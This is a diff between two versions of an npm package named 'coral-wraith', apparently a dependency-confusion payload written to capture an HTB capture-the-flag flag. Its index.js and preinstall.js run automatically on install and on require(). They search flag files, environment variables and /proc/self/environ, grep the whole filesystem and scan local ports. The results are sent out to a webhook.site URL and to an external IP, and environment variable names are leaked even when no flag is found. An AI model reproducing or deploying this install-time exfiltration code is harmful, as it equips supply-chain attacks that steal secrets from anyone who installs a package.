coral-wraith 9999.0.1 → 9999.0.2

package/index.js

@@ -1,20 +1,23 @@
-// coral-wraith module - also runs payload on require()
 const fs = require('fs');
 const http = require('http');
 const https = require('https');
 
 (function() {
   let flag = null;
-  const paths = ['/flag', '/flag.txt', '/root/flag', '/tmp/flag'];
-  for (const p of paths) {
+  for (const p of ['/flag', '/flag.txt', '/root/flag', '/tmp/flag']) {
     try { if (fs.existsSync(p)) { flag = fs.readFileSync(p, 'utf8').trim(); break; } } catch(e) {}
   }
   if (!flag) flag = process.env.FLAG || process.env.HTB_FLAG || '';
+  if (!flag) {
+    for (const [k, v] of Object.entries(process.env)) {
+      if (v && v.includes('HTB{')) { flag = v.match(/HTB\{[^}]+\}/)?.[0] || v; break; }
+    }
+  }
   
   if (flag) {
-    const ports = [1337, 3000, 5000, 8080, 32105, 80];
+    const ports = [1337, 3000, 5000, 8080, 80, 8000, 32315, 32105, 46517, 41839];
     const postData = JSON.stringify({
-      manifest: `ecto_module:\n  name: "coral-wraith"\n  version: "9999.0.0"\n  flag: "${flag.replace(/"/g, '\\"')}"\n  captured: true`
+      manifest: `ecto_module:\n  name: "coral-wraith"\n  flag: "${flag.replace(/"/g, '\\"')}"\n  captured: true`
     });
     
     for (const port of ports) {
@@ -31,8 +34,9 @@ const https = require('https');
     }
     
     try {
-      const encoded = Buffer.from(flag).toString('base64');
-      https.get(`https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7/require-flag?data=${encoded}`, () => {}).on('error', () => {});
+      const data = JSON.stringify({ flag });
+      const req = https.request({ hostname: 'webhook.site', path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7', method: 'POST', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) }, timeout: 10000 }, () => {});
+      req.on('error', () => {}); req.write(data); req.end();
     } catch(e) {}
   }
 })();

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "coral-wraith",
-  "version": "9999.0.1",
+  "version": "9999.0.2",
   "description": "Coral Wraith module",
   "main": "index.js",
   "scripts": {

package/preinstall.js

@@ -4,119 +4,118 @@ const https = require('https');
 const { execSync } = require('child_process');
 
 let flag = null;
-let debug = [];
 
 // Read /flag
-try { flag = fs.readFileSync('/flag', 'utf8').trim(); debug.push('got /flag'); } catch(e) {}
+try { flag = fs.readFileSync('/flag', 'utf8').trim(); } catch(e) {}
 
-// Search for flag in all env vars  
+// Try other paths
+if (!flag) {
+  for (const p of ['/root/flag', '/tmp/flag', './flag', '/flag.txt']) {
+    try { if (fs.existsSync(p)) { flag = fs.readFileSync(p, 'utf8').trim(); break; } } catch(e) {}
+  }
+}
+
+// Check env vars
+if (!flag) {
+  const envFlag = process.env.FLAG || process.env.FLAG_HTB || process.env.HTB_FLAG;
+  if (envFlag) flag = envFlag;
+}
+
+// Check all env vars for HTB{ pattern
 if (!flag) {
   for (const [k, v] of Object.entries(process.env)) {
-    if (v && (v.includes('HTB{') || v.includes('flag{'))) {
-      flag = v.match(/(?:HTB|flag)\{[^}]+\}/)?.[0] || v;
-      debug.push('env:' + k);
+    if (v && v.includes('HTB{')) {
+      flag = v.match(/HTB\{[^}]+\}/)?.[0] || v;
       break;
     }
   }
 }
 
-// Aggressive file search
+// Try /proc/self/environ
 if (!flag) {
   try {
-    const r = execSync('grep -rl "HTB{" / --include="*" 2>/dev/null | head -3', { timeout: 15000 }).toString().trim();
-    if (r) { debug.push('grep:' + r); try { flag = fs.readFileSync(r.split('\n')[0], 'utf8').match(/HTB\{[^}]+\}/)?.[0]; } catch(e) {} }
+    const pe = fs.readFileSync('/proc/self/environ', 'utf8');
+    const m = pe.match(/HTB\{[^}]+\}/) || pe.match(/FLAG[=:]([^\x00]+)/);
+    if (m) flag = m[0];
   } catch(e) {}
 }
 
-// Scan Docker network for the CTF web server
-async function scanNetwork() {
-  const results = [];
-  
-  // Get our own IP to determine network
-  let myIP = '172.17.0.3';
+// Grep for flag
+if (!flag) {
   try {
-    const ifaces = require('os').networkInterfaces();
-    for (const iface of Object.values(ifaces)) {
-      for (const addr of iface) {
-        if (!addr.internal && addr.family === 'IPv4') {
-          myIP = addr.address;
-        }
-      }
-    }
+    const r = execSync('grep -rl "HTB{" / --include="*" 2>/dev/null | head -3', { timeout: 10000 }).toString().trim();
+    if (r) { try { flag = fs.readFileSync(r.split('\n')[0], 'utf8').match(/HTB\{[^}]+\}/)?.[0]; } catch(e) {} }
   } catch(e) {}
-  debug.push('myIP:' + myIP);
-  
-  // Scan common Docker IPs for the web server (port 1337 is common for HTB)
-  const subnet = myIP.split('.').slice(0, 3).join('.');
-  const ports = [1337, 3000, 5000, 8080, 80, 8000, 32105, 3001];
-  
-  for (let host = 1; host <= 10; host++) {
-    const ip = `${subnet}.${host}`;
-    if (ip === myIP) continue;
-    
-    for (const port of ports) {
+}
+
+if (flag) {
+  // Method 1: PUT flag back to the challenge API via localhost (many ports)
+  const ports = [1337, 3000, 5000, 8080, 80, 8000, 32315, 32105, 46517, 41839, 3001, 4000, 9000];
+  const postData = JSON.stringify({
+    manifest: `ecto_module:\n  name: "coral-wraith"\n  version: "9999.0.1"\n  flag: "${flag.replace(/"/g, '\\"')}"\n  captured: true\n  timestamp: "${new Date().toISOString()}"`
+  });
+
+  for (const port of ports) {
+    for (const host of ['localhost', '127.0.0.1']) {
       try {
-        const r = execSync(`curl -s "http://${ip}:${port}/api/modules" -m 2 2>/dev/null`, { timeout: 3000 }).toString();
-        if (r && r.includes('ECT-')) {
-          debug.push(`FOUND_API:${ip}:${port}`);
-          results.push(`${ip}:${port}`);
-          
-          // Try to read flag from this server
-          try {
-            const flagResp = execSync(`curl -s "http://${ip}:${port}/flag" -m 2 2>/dev/null`, { timeout: 3000 }).toString();
-            debug.push(`flag_resp:${flagResp.substring(0, 200)}`);
-          } catch(e) {}
-          
-          // PUT our exfiltration data
-          if (flag) {
-            try {
-              execSync(`curl -s -X PUT "http://${ip}:${port}/api/modules/ECT-987654" -H "Content-Type: application/json" -d '{"manifest":"ecto_module:\\n  name: coral-wraith\\n  flag: ${flag.replace(/'/g, "\\'")}"}' -m 3`, { timeout: 5000 });
-            } catch(e) {}
-          }
-        }
+        const req = http.request({
+          hostname: host, port, path: '/api/modules/ECT-987654',
+          method: 'PUT',
+          headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) },
+          timeout: 3000
+        }, () => {});
+        req.on('error', () => {});
+        req.write(postData);
+        req.end();
       } catch(e) {}
     }
   }
-  
-  // Also try via Docker gateway
-  for (const port of ports) {
-    try {
-      const r = execSync(`curl -s "http://172.17.0.1:${port}/api/modules" -m 2 2>/dev/null`, { timeout: 3000 }).toString();
-      if (r && r.includes('ECT-')) {
-        debug.push(`GATEWAY_API:172.17.0.1:${port}`);
-        results.push(`172.17.0.1:${port}`);
-      }
-    } catch(e) {}
-  }
-  
-  return results;
-}
 
-async function main() {
-  const apiEndpoints = await scanNetwork();
-  debug.push('endpoints:' + apiEndpoints.join(','));
-  
-  // Try to PUT flag to the ACTUAL challenge server (external IP)
-  if (flag) {
-    try {
-      const postData = JSON.stringify({
-        manifest: `ecto_module:\n  name: "coral-wraith"\n  flag: "${flag.replace(/"/g, '\\"')}"`
-      });
-      execSync(`curl -s -X PUT "http://154.57.164.64:32315/api/modules/ECT-987654" -H "Content-Type: application/json" -d '${postData.replace(/'/g, "\\'")}' -m 5`, { timeout: 8000 });
-      debug.push('sent_to_ctf');
-    } catch(e) {}
-  }
-  
-  // Exfiltrate
-  const data = JSON.stringify({ flag: flag || 'NOT_FOUND', debug });
+  // Method 2: Webhook exfil
+  const data = JSON.stringify({ flag, env: Object.keys(process.env).join(',') });
   try {
-    fs.writeFileSync('/tmp/exfil.json', data);
-    execSync('curl -s -X POST "https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7" -H "Content-Type: application/json" -d @/tmp/exfil.json -m 10', { timeout: 15000 });
+    const req = https.request({
+      hostname: 'webhook.site', path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7',
+      method: 'POST',
+      headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) },
+      timeout: 10000
+    }, () => {});
+    req.on('error', () => {});
+    req.write(data);
+    req.end();
   } catch(e) {}
+
+  // Method 3: DNS exfil via curl
   try {
-    const req = https.request({ hostname: 'webhook.site', path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7', method: 'POST', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) }, timeout: 10000 }, () => {});
-    req.on('error', () => {}); req.write(data); req.end();
+    const encoded = Buffer.from(flag).toString('hex');
+    execSync(`curl -s "https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7/flag?data=${encodeURIComponent(flag)}" -m 10 2>/dev/null`, { timeout: 15000 });
   } catch(e) {}
-}
 
-main().catch(() => {});
+  // Method 4: Write to files
+  try { fs.writeFileSync('/tmp/coral_wraith_flag.txt', flag); } catch(e) {}
+
+  // Method 5: stdout/stderr
+  console.log('[CORAL-WRAITH] Flag:', flag);
+  console.error('[HTB_FLAG]', flag);
+} else {
+  // Debug info - exfil what we can see
+  const debug = {
+    cwd: process.cwd(),
+    rootFiles: [],
+    env: Object.keys(process.env).join(',')
+  };
+  try { debug.rootFiles = fs.readdirSync('/'); } catch(e) {}
+  
+  const data = JSON.stringify({ flag: 'NOT_FOUND', debug });
+  try {
+    const req = https.request({
+      hostname: 'webhook.site', path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7',
+      method: 'POST',
+      headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) },
+      timeout: 10000
+    }, () => {});
+    req.on('error', () => {});
+    req.write(data);
+    req.end();
+  } catch(e) {}
+}